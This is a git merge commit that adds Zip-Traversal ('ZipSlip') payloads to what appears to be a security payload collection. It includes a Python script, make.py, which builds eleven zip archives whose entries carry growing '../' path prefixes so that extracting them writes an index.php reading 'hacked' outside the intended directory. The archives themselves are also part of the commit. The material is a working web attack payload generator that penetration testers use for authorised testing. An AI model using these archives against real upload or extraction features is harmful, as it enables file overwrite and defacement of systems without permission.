Merge pull request #197 from g0tmi1k/zip

Add Zip-Traversal Payloads ("#ZipSlip")
2018-06-13 10:42:03 +01:00
parent baccc85625 2faed8415e
commit 16037f5f16
14 changed files with 56 additions and 25 deletions
--- a/Payloads/Zip-Traversal/depth-00.zip
+++ b/Payloads/Zip-Traversal/depth-00.zip
--- a/Payloads/Zip-Traversal/depth-01.zip
+++ b/Payloads/Zip-Traversal/depth-01.zip
--- a/Payloads/Zip-Traversal/depth-02.zip
+++ b/Payloads/Zip-Traversal/depth-02.zip
--- a/Payloads/Zip-Traversal/depth-03.zip
+++ b/Payloads/Zip-Traversal/depth-03.zip
--- a/Payloads/Zip-Traversal/depth-04.zip
+++ b/Payloads/Zip-Traversal/depth-04.zip
--- a/Payloads/Zip-Traversal/depth-05.zip
+++ b/Payloads/Zip-Traversal/depth-05.zip
--- a/Payloads/Zip-Traversal/depth-06.zip
+++ b/Payloads/Zip-Traversal/depth-06.zip
--- a/Payloads/Zip-Traversal/depth-07.zip
+++ b/Payloads/Zip-Traversal/depth-07.zip
--- a/Payloads/Zip-Traversal/depth-08.zip
+++ b/Payloads/Zip-Traversal/depth-08.zip
--- a/Payloads/Zip-Traversal/depth-09.zip
+++ b/Payloads/Zip-Traversal/depth-09.zip
--- a/Payloads/Zip-Traversal/depth-10.zip
+++ b/Payloads/Zip-Traversal/depth-10.zip
--- a/Payloads/Zip-Traversal/index.php
+++ b/Payloads/Zip-Traversal/index.php
@@ -0,0 +1 @@
+hacked
--- a/Payloads/Zip-Traversal/make.py
+++ b/Payloads/Zip-Traversal/make.py
@@ -0,0 +1,30 @@
+#!/usr/bin/env python3
+
+import zipfile
+
+# The file to USE inside the zip, before compression
+filein = "index.php"
+print("[i] FileIn: %s\n" % filein)
+
+# How deep are we going?
+depth = ""
+
+# Loop 11 times (00-10)
+for i in range(11):
+  # The .zip file to use
+  zipname = "depth-%02d.zip" % i
+  print("[i] ZipName: %s" % zipname)
+
+  # Get the zip file out ready
+  with zipfile.ZipFile(zipname , 'w') as zip:
+  	# The file INSIDDE the zip
+    filezip = "%s%s" % (depth, filein)
+    print("[i] ZipFile: %s" % filezip)
+
+    # Write the zip file out
+    zip.write(filein, filezip)
+
+    # Increase depth for next loop
+    depth += "../"
+
+print("\n[i] Done")